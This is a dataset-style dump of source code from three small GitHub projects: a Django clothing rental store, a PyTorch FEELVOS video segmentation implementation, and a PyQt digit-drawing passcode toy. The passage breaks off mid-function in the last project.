repo_name
string | combined_content
string | file_paths
list |
|---|---|---|
0-Ajay-Bhargav-0/FashHUB
|
from django.shortcuts import render,redirect,reverse,HttpResponse
from django.contrib.auth.models import User,auth
from django.contrib import messages
from .forms import ProfileForm,UserForm
from .models import Profile
def register(request):
if request.method == 'POST':
username = request.POST['username']
email = request.POST['email']
phone_number = request.POST['phone_number']
birth_date = request.POST['birth_date']
password1 = request.POST['password1']
password2 = request.POST['password2']
user = User.objects.create_user(username=username,email=email,password=password1)
user.save()
profile = Profile.objects.get(user=user)
profile.phone_number=phone_number
profile.birth_date=birth_date
profile.save()
print("user created")
return redirect('/accounts/login')
return render(request,'register.html')
def login(request):
if request.method=='POST':
username=request.POST['username']
password=request.POST['password']
user=auth.authenticate(username=username,password=password)
if user is not None:
auth.login(request,user)
print('login successful')
return redirect('/')
else:
print("wrong credentials")
return render(request,'login.html')
def logout(request):
auth.logout(request)
print("logged out")
return redirect('/')
--- FILE SEPARATOR ---
from django.contrib import admin
from store.models import Product,Cart,Wishlist,Contact,events,Journal,Donations
# Register your models here.
admin.site.register(Product)
admin.site.register(Cart)
admin.site.register(Wishlist)
admin.site.register(Contact)
admin.site.register(events)
admin.site.register(Journal)
admin.site.register(Donations)
--- FILE SEPARATOR ---
# Generated by Django 2.2 on 2020-10-31 16:35
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=300, null=True)),
('details', models.TextField(max_length=300, null=True)),
],
),
migrations.CreateModel(
name='Donations',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Name', models.CharField(max_length=300, null=True)),
('email', models.CharField(max_length=300, null=True)),
('phone_number', models.CharField(max_length=300, null=True)),
('address', models.CharField(max_length=300, null=True)),
('clothes_number', models.CharField(max_length=300, null=True)),
],
),
migrations.CreateModel(
name='events',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=300, null=True)),
('organizer_name', models.CharField(max_length=300, null=True)),
('details', models.TextField(max_length=300, null=True)),
('phone_number', models.IntegerField(blank=True)),
('email', models.CharField(max_length=300, null=True)),
],
),
migrations.CreateModel(
name='Journal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img_front', models.ImageField(blank=True, upload_to='')),
('img', models.ImageField(blank=True, upload_to='')),
('category', models.CharField(max_length=300, null=True)),
('title', models.CharField(max_length=300, null=True)),
('author', models.CharField(max_length=300, null=True)),
('details', models.CharField(max_length=300, null=True)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mainimage', models.ImageField(blank=True, upload_to='')),
('img1', models.ImageField(blank=True, upload_to='')),
('img2', models.ImageField(blank=True, upload_to='')),
('img3', models.ImageField(blank=True, upload_to='')),
('price', models.FloatField()),
('studio_name', models.CharField(max_length=300, null=True)),
('size', models.CharField(max_length=300, null=True)),
('gender', models.CharField(max_length=300, null=True)),
('category', models.CharField(max_length=300, null=True)),
('rent_price', models.FloatField(null=True)),
('count', models.IntegerField(default=0)),
('rented', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Wishlist',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='store.Product')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Cart',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.Product')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
--- FILE SEPARATOR ---
# Generated by Django 2.2 on 2020-10-31 20:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='journal',
name='details',
field=models.TextField(max_length=1000, null=True),
),
]
--- FILE SEPARATOR ---
# Generated by Django 2.2 on 2020-10-31 20:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0002_auto_20201101_0205'),
]
operations = [
migrations.AddField(
model_name='journal',
name='content',
field=models.TextField(max_length=1000, null=True),
),
migrations.AddField(
model_name='journal',
name='date',
field=models.DateField(null=True),
),
]
--- FILE SEPARATOR ---
# Generated by Django 2.2 on 2020-10-31 21:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0003_auto_20201101_0222'),
]
operations = [
migrations.RemoveField(
model_name='events',
name='details',
),
migrations.AddField(
model_name='events',
name='bio',
field=models.TextField(max_length=1000, null=True),
),
]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Product(models.Model):
mainimage = models.ImageField(blank=True)
img1 = models.ImageField(blank=True)
img2 = models.ImageField(blank=True)
img3 = models.ImageField(blank=True)
# category = models.ForeignKey(Category, on_delete=models.CASCADE)
# detail_text = models.TextField(max_length=1000, verbose_name='Detail Text')
price = models.FloatField()
studio_name = models.CharField(max_length=300,null=True)
size = models.CharField(max_length=300,null=True)
gender = models.CharField(max_length=300,null=True)
category = models.CharField(max_length=300,null=True)
rent_price = models.FloatField(null=True)
count = models.IntegerField(default=0)
rented = models.BooleanField(default=False)
def __str__(self):
return self.category
class events(models.Model):
name = models.CharField(max_length=300,null=True)
organizer_name = models.CharField(max_length=300,null=True)
bio = models.TextField(max_length=1000,null=True)
#image = models.IntegerField(blank=True)
#link = models.CharField(max_length=300,null=True)
phone_number = models.IntegerField(blank=True)
email = models.CharField(max_length=300,null=True)
venue = models.CharField(max_length=300,null=True)
date = models.DateField(null=True)
def __str__(self):
return self.name
class Journal(models.Model):
img_front = models.ImageField(blank=True)
img = models.ImageField(blank=True)
category = models.CharField(max_length=300,null=True)
title = models.CharField(max_length=300,null=True)
date = models.DateField(null=True)
author = models.CharField(max_length=300,null=True)
details = models.TextField(max_length=1000,null=True)
content = models.TextField(max_length=1000,null=True)
def __str__(self):
return self.title
class Contact(models.Model):
name = models.CharField(max_length=300,null=True)
details = models.TextField(max_length=300,null=True)
def __str__(self):
return self.name
class Cart(models.Model):
item = models.ForeignKey(Product, on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.item.category
class Wishlist(models.Model):
item = models.ForeignKey(Product, on_delete=models.DO_NOTHING)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.item.category
class Donations(models.Model):
Name = models.CharField(max_length=300,null=True)
email = models.CharField(max_length=300,null=True)
phone_number = models.CharField(max_length=300,null=True)
address = models.CharField(max_length=300,null=True)
clothes_number = models.CharField(max_length=300,null=True)
--- FILE SEPARATOR ---
"""WASP URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from . import views
urlpatterns = [
path('',views.index,name='index'),
path('eventform/',views.eventform,name='eventform'),
path('eventpage/',views.eventpage,name='eventpage'),
path('event/<int:id>',views.event,name='event'),
path('journal/',views.journal,name='journals'),
path('journal/<int:id>',views.journal_page,name='journal_page'),
path('products/<int:id>/',views.product,name='product'),
path('cart/',views.showcart,name='cart'),
path('addcart/<int:id>',views.addcart,name='addcart'),
path('buy/<int:id>',views.buy,name='buy'),
path('buycart/',views.buycart,name='buycart'),
path('showWishlist/',views.showWishlist,name='showWishlist'),
path('addWishlist/<int:id>',views.addWishlist,name='addWishlist'),
path('removeWishlist/<int:id>',views.removeWishlist,name='removeWishlist'),
path('donation/',views.donation,name='donation'),
path('products/<str:gender>/<str:category>',views.genderCategory,name='genderCategory'),
path('aboutus/',views.aboutus,name='aboutus'),
# path('<str:gender>/<str:category>',views.,name='menbottom'),
# path('<str:gender>/<str:category>',views.,name='menfootware'),
# path('<str:gender>/<str:category>',views.,name='menaccessories'),
# path('women/<str:category>',views.,name='womenshirt'),
# path('women/bottom',views.,name='womenbottom'),
# path('women/footware',views.,name='womenfootware'),
# path('women/accessories',views.,name='womenaccessories'),
# path('kids/shirt',views.,name='kidsshirt'),
# path('kids/bottom',views.,name='kidsbottom'),
# path('kids/footware',views.,name='kidsfootware'),
# path('kids/accessories',views.,name='kidsaccessories'),
# path('fluids/shirt',views.,name='fluidsshirt'),
# path('fluids/bottom',views.,name='fluidsbottom'),
# path('fluids/footware',views.,name='fluidsfootware'),
# path('fluids/accessories',views.,name='fluidsaccessories'),
]
# shirt
# jeans
# footware
# sheatshirts
# jackets
# fitness
# tshirts
# ethnic
# men, women, kid, fluids
--- FILE SEPARATOR ---
from django.shortcuts import render,redirect
from .models import Contact,Journal,Product,Cart,Wishlist,events,Donations
# Create your views here.
def index(request):
if request.method=='POST':
email = request.POST['email']
message = request.POST['Message']
contact = Contact.objects.create(name=email,details=message)
contact.save()
# product = Product.objects.all()
# context = {
# 'product':product,
# }
return render(request,'index.html')
def eventform(request):
if request.method=='POST':
username = request.POST['Event Name']
email = request.POST['email']
phone_number = request.POST['phone']
organization = request.POST['Organisation']
date = request.POST['date']
venue = request.POST['venue']
bio = request.POST['Bio']
event = events.objects.create(name=username,organizer_name=organization,bio=bio,phone_number=phone_number,email=email,venue=venue,date=date)
event.save()
return redirect('/eventform')
return render(request,'eventreg.html')
def eventpage(request):
event = events.objects.all()
context = {
'events':event,
}
return render(request,'events.html',context=context)
def event(request,id):
event = events.objects.get(id=id)
context = {
'event':event,
}
return render(request,'event.html',context=context)
def journal(request):
journals = Journal.objects.all()
context = {
"journals":journals,
}
return render(request,'journal.html',context=context)
def journal_page(request,id):
journal = Journal.objects.get(id=id)
context = {
'journal':journal,
}
return render(request,'journal-page.html',context=context)
def aboutus(request):
return render(request,'aboutus.html')
# def products(request):
# products = Product.objects.all()
# context = {
# "products":products,
# }
# return render(request,'products.html',context=context)
def product(request,id):
product = Product.objects.get(id=id)
context = {
"product":product,
}
return render(request,'product.html',context=context)
def showcart(request):
cart = Cart.objects.filter(user=request.user)
context = {
'cart':cart,
}
return render(request,'cart.html',context=context)
def addcart(request,id):
product = Product.objects.get(id=id)
Cart.objects.create(item=product,user=request.user)
return redirect('/')
def buy(request,id):
product = Product.objects.get(id=id)
product.count-=1
if product.count<0:
product.count=0
product.save()
return redirect('/')
def buycart(request):
cart = Cart.objects.filter(user=request.user)
for item in cart:
item.item.count-=1
if item.item.count<0:
item.item.count=0
item.item.save()
cart = Cart.objects.filter(user=request.user).delete()
return redirect('/')
def showWishlist(request):
wishlist = Wishlist.objects.filter(user=request.user)
context = {
'wishlist':wishlist,
}
return render(request,'wishlist.html',context=context)
def addWishlist(request,id):
product = Product.objects.get(id=id)
Wishlist.objects.create(item=product,user=request.user)
return redirect('/')
def removeWishlist(request,id):
product = Product.objects.get(id=id)
Wishlist.objects.get(item=product).delete()
return redirect('showWishlist/')
#remove cart feature
def genderCategory(request,gender,category):
product = Product.objects.filter(gender=gender,category=category)
context = {
"product":product,
"gender":gender,
"category":category,
}
return render(request,'sproducts.html',context=context)
def donation(request):
if request.method=='POST':
name = request.POST['name']
email = request.POST['email']
phone_number = request.POST['phone']
address = request.POST['address']
clothes_number = request.POST['clothes']
donation = Donations.objects.create(phone_number=phone_number,email=email,Name=name,address=address,clothes_number=clothes_number)
donation.save()
return render(request,'donations.html')
|
[
"/accounts/views.py",
"/store/admin.py",
"/store/migrations/0001_initial.py",
"/store/migrations/0002_auto_20201101_0205.py",
"/store/migrations/0003_auto_20201101_0222.py",
"/store/migrations/0004_auto_20201101_0245.py",
"/store/models.py",
"/store/urls.py",
"/store/views.py"
] |
0-Yzx/FEELVOS
|
from itertools import combinations
from cv2 import cv2
import os
import natsort
import pandas as pd
import numpy as np
import torch
import torchvision
from torch.utils.data import Dataset, DataLoader
from torchvision.transforms import ToPILImage
from torchvision import transforms, utils
from feelvos.transform import preprocessing
class FEELVOSTriple(Dataset):
def __init__(self, root='./data/', split='train', transform=None):
super().__init__()
self.root = root
self.split = split
self.transform = transform
self.folder_list = []
self.items = []
folder_f = open(os.path.join(root, self.split+"_folder_list.txt"), "r")
for x in folder_f:
self.folder_list.append(x[:-1])
for i in range(len(self.folder_list)):
tmp_list = natsort.natsorted(os.listdir(os.path.join(root, 'image', self.folder_list[i])))
for j in range(len(tmp_list) - 2):
first = tmp_list[j]
for k in range(len(tmp_list[j+1:])-1):
comb_1 = tmp_list[k+1]
comb_2 = tmp_list[k+2]
self.items.append((os.path.join(self.root, 'image', self.folder_list[i], first), os.path.join(self.root, 'image', self.folder_list[i], comb_1), os.path.join(self.root, 'image', self.folder_list[i], comb_2)))
def __getitem__(self, index):
src = []
mask = []
seltem = self.items[index]
for i in range(3):
src.append(cv2.imread(seltem[i]))
mask.append(cv2.imread(os.path.join(seltem[i].split('/')[1], 'mask', seltem[i].split('/')[3], seltem[i].split('/')[4])))
sample = (src, mask)
if self.transform is None:
pass
else:
sample = self.transform(*sample)
if self.split == 'train':
sample[0][0] = sample[1][0]
sample[0][1] = sample[1][1]
return sample
def __len__(self):
return len(self.items)
if __name__ == "__main__":
ds_train = FEELVOSTriple(root='./data/', split='train', transform=preprocessing)
ds_test = FEELVOSTriple(root='./data/', split='test', transform=preprocessing)
print("DATA LOADED")
--- FILE SEPARATOR ---
import torch
import torch.nn as nn
from feelvos.models.Embeddings import DepthwiseSeparableConv2D
class DynamicSegmentationHead(nn.Module):
def __init__(self, cin, cout):
super(DynamicSegmentationHead, self).__init__()
self.depthwise_l = DepthwiseSeparableConv2D(cin, 256, 7)
self.depthwise_r = DepthwiseSeparableConv2D(256, 256, 7)
self.conv = nn.Conv2d(256, cout, 1)
def forward(self, x):
x = self.depthwise_l(x)
x = self.depthwise_r(x)
x = self.depthwise_r(x)
x = self.depthwise_r(x)
x = nn.ReLU(inplace=True)(x)
x = self.conv(x)
x = nn.Softmax2d()(x)
return x
--- FILE SEPARATOR ---
import torch
import torch.nn as nn
import torch.nn.functional as F
from modelsummary import summary
class DepthwiseSeparableConv2D(nn.Module):
def __init__(self, c_in, c_out, kernel_size=1, stride=1, padding=0, dilation=1, bias=False):
super(DepthwiseSeparableConv2D,self).__init__()
self.conv1 = nn.Conv2d(c_in, c_in, kernel_size, stride, padding, dilation, groups=c_in, bias=bias)
self.pointwise = nn.Conv2d(c_in, c_out, 1, 1, 0, 1, 1, bias=bias)
def forward(self, x):
x = self.conv1(x)
x = self.pointwise(x)
return x
class PixelwiseEmbedding(nn.Module):
def __init__(self, c_in, c_out_1, c_out_2):
super(PixelwiseEmbedding, self).__init__()
self.separable = DepthwiseSeparableConv2D(c_in=c_in, c_out=c_out_1, kernel_size=3, stride=1, padding=1)
self.conv1 = nn.Conv2d(c_out_1, c_out_2, kernel_size=1, stride=1, padding=0)
def forward(self, x):
x = self.separable(x)
x = self.conv1(x)
return x
--- FILE SEPARATOR ---
from cv2 import cv2
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from modelsummary import summary
from feelvos.models.Backbone import UNet
from feelvos.models.Embeddings import PixelwiseEmbedding
from feelvos.models.DynamicSegmentationHead import DynamicSegmentationHead
from feelvos.models.Matching import global_matching, local_matching
class FEELVOS(nn.Module):
def __init__(self, c_in, n_classes, use_gt=True, pretrained=None):
super(FEELVOS, self).__init__()
self.n_classes = n_classes
self.use_gt = use_gt
self.backbone = None
if pretrained is not None and self.backbone is None:
self.backbone = UNet(c_in, n_classes)
self.backbone.load_state_dict(torch.load(pretrained))
self.backbone.eval()
self.embedding = PixelwiseEmbedding(n_classes, n_classes, 100)
self.dsh = DynamicSegmentationHead(n_classes+1+1+1, 1)
def forward(self, x_list):
x1 = x_list[0]
x2 = x_list[1]
x3 = x_list[2]
if self.use_gt == False:
with torch.no_grad():
x1 = self.backbone(x1)
x2 = self.backbone(x2)
with torch.no_grad():
x3 = self.backbone(x3)
x1_l = []; x1_e = []
x2_l = []; x2_e = []
x3_l = []; x3_e = []
gm = []; lm = []
logits = []
x1 = F.interpolate(x1, 32)
x2 = F.interpolate(x2, 32)
x3 = F.interpolate(x3, 32)
for i in range(self.n_classes):
x1_l.append(x1[:, i, :, :].unsqueeze(1))
x1_e.append(self.embedding(x1_l[i]))
x2_l.append(x2[:, i, :, :].unsqueeze(1))
x2_e.append(self.embedding(x2_l[i]))
x3_l.append(x3[:, i, :, :].unsqueeze(1))
x3_e.append(self.embedding(x3_l[i]))
with torch.no_grad():
gm.append(global_matching(x1_e[i], x3_e[i]))
lm.append(global_matching(x2_e[i], x3_e[i]))
x_t = torch.cat((x3, gm[i].cuda(), lm[i].cuda(), x2_l[i]), dim=1)
logits.append(self.dsh(x_t))
x = None
for i in range(self.n_classes):
if i == 0:
x = logits[i]
else:
x = torch.cat((logits[i-1], logits[i]), dim=1)
return x
if __name__ == "__main__":
device = torch.device("cuda:0")
model = FEELVOS(3, 1, use_gt=False).cuda(device=device)
# summary(model, torch.zeros((1, 3, 512, 512)).cuda(), show_input=True)
# summary(model, torch.zeros((1, 3, 512, 512)).cuda(), show_input=False)
x1 = cv2.imread('example/x2.png')
x2 = cv2.imread('example/x3.png')
x1 = cv2.resize(x1, dsize=(256, 256))
x1 = torchvision.transforms.ToTensor()(x1)
x1 = x1.unsqueeze(0).to(device=device)
x2 = cv2.resize(x2, dsize=(256, 256))
x2 = torchvision.transforms.ToTensor()(x2)
x2 = x2.unsqueeze(0).to(device=device)
x = torch.cat((x1, x2), dim=0)
y = model(x, x, x)
print(y)
--- FILE SEPARATOR ---
from cv2 import cv2
import torch
import torch.nn as nn
import torchvision
from torch.autograd.variable import Variable
from .correlation_package.correlation import Correlation
def distance(p, q):
ps = torch.sum(p * p)
qs = torch.sum(q * q)
norm = torch.norm(ps-qs, p=2, dim=-1)
res = 1 - (2 / (1 + torch.exp(norm)))
return res
def global_matching(x, y):
output = torch.zeros(x.size(0), 1, x.size(2), x.size(3))
for i in range(x.size(0)):
for j in range(x.size(2)):
for k in range(x.size(3)):
output[i, :, j, k] = distance(x[i, :, j, k], y[i, :, j, k])
return output
def local_matching(x, y, window):
output = torch.zeros(x.size(0), 1, x.size(2), x.size(3))
# out_corr = Correlation(pad_size=6, kernel_size=window, max_displacement=0, stride1=1, stride2=1, corr_multiply=1)(x, y)
return output
--- FILE SEPARATOR ---
import random
import torch
import torch.nn as nn
import torchvision
from torch.utils.data import DataLoader
import torchvision.transforms as transforms
from feelvos.models.Backbone import UNet
from feelvos.dataset import FEELVOSTriple
from feelvos.transform import preprocessing
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(device)
if __name__ == "__main__":
target_folder = './data/'
ds_test = FEELVOSTriple(root='./data/', split='test', transform=preprocessing)
loc = './unet/weight010'
model = UNet(3, 1)
model.load_state_dict(torch.load(loc+'.pt'))
model = model.to(device)
model.eval()
pick = []
for i in range(1):
pick.append(random.randrange(0, 500, 1))
for i in pick:
X, y = ds_test.__getitem__(i)
torchvision.utils.save_image(X[0], './testimage/'+str(i)+'_X'+'.png')
torchvision.utils.save_image(y[0], './testimage/'+str(i)+'_y'+'.png')
X = X[0].view(1, 3, 256, 256).cuda()
y_pred = model(X)
torchvision.utils.save_image(y_pred, './testimage/'+loc.split('/')[-1]+'_'+str(i)+'_ypred'+'.png')
--- FILE SEPARATOR ---
import argparse
from feelvos.dataset import FEELVOSTriple
from feelvos.transform import preprocessing
from feelvos.models.FEELVOS import FEELVOS
from feelvos.loss import dice_loss
from feelvos.metric import dice_coeff
from feelvos.trainer import Trainer
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from tensorboardX import SummaryWriter
parser = argparse.ArgumentParser()
parser.add_argument(
'--batch_size', type=int, default=7
)
parser.add_argument(
'--epoch', type=int, default=40
)
parser.add_argument(
'--lr', type=float, default=0.001
)
parser.add_argument(
'--dataset', type=str, default='./data/'
)
parser.add_argument(
'--workers', type=int, default=4
)
cfg = parser.parse_args()
print(cfg)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print(device)
if __name__ == "__main__":
ds_train = FEELVOSTriple(root='./data/', split='train', transform=preprocessing)
ds_test = FEELVOSTriple(root='./data/', split='test', transform=preprocessing)
dl_train = DataLoader(ds_train, batch_size=cfg.batch_size, shuffle=True, num_workers=cfg.workers)
dl_test = DataLoader(ds_test, batch_size=cfg.batch_size, shuffle=False, num_workers=cfg.workers)
print("DATA LOADED")
model = FEELVOS(3, 1, use_gt=True, pretrained='./unet/weight010.pt')
optimizer = torch.optim.Adam(model.parameters(), lr=cfg.lr)
criterion = nn.BCELoss()
success_metric = nn.BCELoss()
summary = SummaryWriter()
trainer = Trainer(model, criterion, optimizer, success_metric, device, None, False)
fit = trainer.fit(dl_train, dl_test, num_epochs=cfg.epoch, checkpoints='./save2/'+model.__class__.__name__+'.pt')
torch.save(model.state_dict(), './save/final_state_dict.pt')
torch.save(model, './save/final.pt')
loss_fn_name = "cross entropy"
best_score = str(fit.best_score)
print(f"Best loss score(loss function = {loss_fn_name}): {best_score}")
--- FILE SEPARATOR ---
from cv2 import cv2
import torchvision.transforms as transforms
def preprocessing(images, masks):
fin_images = []
fin_masks = []
image_transform = transforms.Compose(
[
transforms.ToTensor(),
]
)
for i in range(len(images)):
tmp_i = cv2.resize(images[i], dsize=(256, 256), interpolation=cv2.INTER_AREA)
tmp_m = cv2.resize(masks[i], dsize=(256, 256), interpolation=cv2.INTER_AREA)
tmp_m = cv2.cvtColor(tmp_m, cv2.COLOR_BGR2GRAY)
for x in range(tmp_m.shape[0]):
for y in range(tmp_m.shape[1]):
if tmp_m[y, x] == 29:
tmp_m[y, x] = 255
fin_images.append(image_transform(tmp_i).float())
fin_masks.append(image_transform(tmp_m).float())
return fin_images, fin_masks
--- FILE SEPARATOR ---
import torch
def list_to_tensor(t_list, x, y, device):
for i in range(x):
for j in range(y):
t_list[i][j] = torch.from_numpy(t_list[i][j]).to(device=device)
return t_list
--- FILE SEPARATOR ---
from setuptools import setup, find_packages
setup(
name = 'feelvos',
version = '0.5',
description = 'FEELVOS implementation in PyTorch; FEELVOS: Fast End-to-End Embedding Learning for Video Object Segmentation',
author = 'Younghan Kim',
author_email = 'godppkyh@mosqtech.com',
install_requires= [],
packages = find_packages(),
python_requires = '>=3.6'
)
|
[
"/feelvos/dataset.py",
"/feelvos/models/DynamicSegmentationHead.py",
"/feelvos/models/Embeddings.py",
"/feelvos/models/FEELVOS.py",
"/feelvos/models/Matching.py",
"/feelvos/test.py",
"/feelvos/train.py",
"/feelvos/transform.py",
"/feelvos/util/toTensor.py",
"/setup.py"
] |
0-gpa-gang/NumRoll
|
import sqlite3
def create():
conn = sqlite3.connect('image.db')
c = conn.cursor()
c.execute("""DROP TABLE image""")
c.execute("""CREATE TABLE image (
path TEXT PRIMARY KEY,
classifier INTEGER DEFAULT "N/A"
)""")
c.execute("""INSERT INTO image (path)
VALUES
('image/0.jpeg'),
('image/1.jpeg'),
('image/2.jpeg'),
('image/3.jpeg'),
('image/4.jpeg');""")
conn.commit()
if __name__ == "__main__":
create()
--- FILE SEPARATOR ---
class Image:
def __init__(self, path, classifier):
self.path = path
self.classifier = classifier
--- FILE SEPARATOR ---
import sys
from PyQt5 import QtCore, QtGui, uic, QtWidgets
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QLabel
from PyQt5.QtWidgets import QWidget
from PyQt5.QtWidgets import QPushButton,QAction, QShortcut
from PyQt5.QtGui import QIcon, QKeySequence
from PyQt5.QtCore import Qt,pyqtSlot
class Canvas(QtWidgets.QMainWindow):
def __init__(self, index):
super().__init__()
self.label = QtWidgets.QLabel()
self.whiteboard = QtGui.QPixmap(280,280)
#self.setStyleSheet("background-color: black;")
self.label.setPixmap(self.whiteboard)
self.setCentralWidget(self.label)
self.index = index
#self.count = 0
self.last_x, self.last_y = None, None
def mouseMoveEvent(self, e):
if self.last_x is None:
self.last_x = e.x()
self.last_y = e.y()
return
cursor = QtGui.QPainter(self.label.pixmap())
p = QtGui.QPen()
p.setWidth(12)
p.setColor(QtGui.QColor('#FFFFFF'))
cursor.setPen(p)
cursor.drawLine(self.last_x, self.last_y, e.x(), e.y())
cursor.end()
self.update()
# update the origin for the next event
self.last_x = e.x()
self.last_y = e.y()
def mouseReleaseEvent(self, e):
self.last_x = None
self.last_y = None
def save(self):
p = QWidget.grab(self)
p_resized = p.scaled(28,28,QtCore.Qt.KeepAspectRatio, transformMode=QtCore.Qt.SmoothTransformation)
fileName = "image/"+ str(self.index) +".jpeg"
p_resized.save(fileName, 'JPEG')
print("image saved!")
self.close()
def save_all(lst_wind):
for i in lst_wind:
i.save()
def canvases():
app = QtWidgets.QApplication(sys.argv)
windows = []
shortcuts = []
for i in range(5):
windows.append(Canvas(i))
windows[i].setWindowFlags(QtCore.Qt.FramelessWindowHint)
windows[i].move(340+i*300,400)
shortcuts.append(QShortcut(QKeySequence('Ctrl+S'), windows[i]))
shortcuts[i].activated.connect(lambda: save_all(windows))
for i in range(5):
windows[i].show()
app.exec_()
if __name__ == "__main__":
canvases()
--- FILE SEPARATOR ---
import numpy as np
import tensorflow as tf
from PIL import Image
from io_file import *
from tensorflow import keras
from tensorflow.keras.models import load_model
from Database import *
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
try:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
except RuntimeError as e:
print(e)
class Classify:
def __init__(self):
self.model = load_model("NumRoll.h5")
def classify(self, np_arr):
prediction = self.model.predict(np.array([np_arr]))
return np.argmax(prediction)
def classify_all(self, lst):
num_list = []
for i in lst:
num_list.append(int(self.classify(i)))
return num_list
class DataSet:
def __init__(self):
self.position = read_from_db() # a list of string locations
self.num_array = [] #a list of numpy arrays
def get_num_array(self):
return self.num_array
def image_to_array(self):
total_arrays = []
for i in self.position:
image = Image.open(i)
data = np.array(image).astype('float32')/255.0
data = np.sum(data, axis=-1)/data.shape[-1]
total_arrays.append(data)
self.num_array = total_arrays
def classify_and_save():
create()
data = DataSet()
data.image_to_array()
print(data.num_array)
classifier = Classify()
final = classifier.classify_all(data.num_array)
print(final)
output_to_db(final)
if __name__ == "__main__":
classify_and_save()
--- FILE SEPARATOR ---
import sys
import os
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QLabel
from PyQt5.QtWidgets import QWidget
from PyQt5.QtWidgets import QPushButton
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot, Qt
from PyQt5 import uic
app = QApplication(sys.argv)
failWindow = QWidget()
failWindow.setWindowTitle("Error!")
failWindow.setGeometry(150,150,800,300)
failWindow.move(560,560)
failmsg = QLabel('<h2>WRONG CODE! DENIED ACCESS</h2>', parent = failWindow)
failmsg.move(60,60)
failWindow.show()
sys.exit(app.exec_())
--- FILE SEPARATOR ---
import sqlite3
import os
# import the following lines to the main py file
# conn = sqlite3.connect("image.db")
# c = conn.cursor()
def read_from_db():
conn = sqlite3.connect("image.db")
c = conn.cursor()
c.execute("SELECT * FROM image")
total = []
for row in c.fetchall():
total.append(row[0])
return total
def output_to_db(classify):
conn = sqlite3.connect("image.db")
c = conn.cursor()
total = read_from_db()
for i in range(len(classify)):
num = classify[i]
location = total[i]
c.execute("UPDATE image SET classifier = (?) WHERE path = (?)", (num, location))
conn.commit()
# if want to see the classified result in a printed list, turn docstring into code
"""
classified = []
c.execute("SELECT * FROM image")
for row in c.fetchall():
classified.append(row[1])
print(classified)
"""
def special_case():
conn = sqlite3.connect("image.db")
c = conn.cursor()
c.execute("SELECT * FROM image")
special = ""
for row in c.fetchall():
special += str(row[1])
if special == "42069":
os.system("vlc RickRoll.mp4") # change with system
--- FILE SEPARATOR ---
import sys
import os
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QLabel
from PyQt5.QtWidgets import QWidget
from PyQt5.QtWidgets import QPushButton
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot, Qt
from PyQt5 import uic
import numpy as np
from classifier import *
from canvas import *
import sqlite3
def window():
# create instance of QApplication
# sys.argv contains command link arguments
app = QApplication(sys.argv)
#create the GUI
widget = QWidget()
widget.setWindowTitle("NumRoll")
# (x,y,width, height)
widget.setGeometry(150,150,1500,700)
widget.move(1170, 330)
welcomemsg = QLabel('<h1>Your Homework is Locked!</h1>', parent=widget)
welcomemsg.move(350,60)
instruction = QLabel('<h3>Toggle your mouse to write down your 5-bit passcode</h3>', parent = widget)
instruction.move(250,120)
instruction2 = QLabel('<h3>When you are done, Press "Ctrl+S" to proceed.</h3>', parent = widget)
instruction2.move(340,600)
# make the buttons
start = QPushButton(widget)
start.setStyleSheet("background-color:red")
start.setText("Click here to start.")
start.move(600,180)
start.clicked.connect(start_pushed)
# show the window
widget.show()
# execute the program
sys.exit(app.exec_())
def start_pushed():
os.system("python3 canvas.py")
classify_and_save()
compare('12345')
def compare(passcode):
conn = sqlite3.connect("image.db")
c = conn.cursor()
c.execute("""SELECT classifier FROM image""")
#print(str(c.fetchall()))
code = []
for i in c.fetchall():
code.append(str(i[0]))
a = "".join(code)
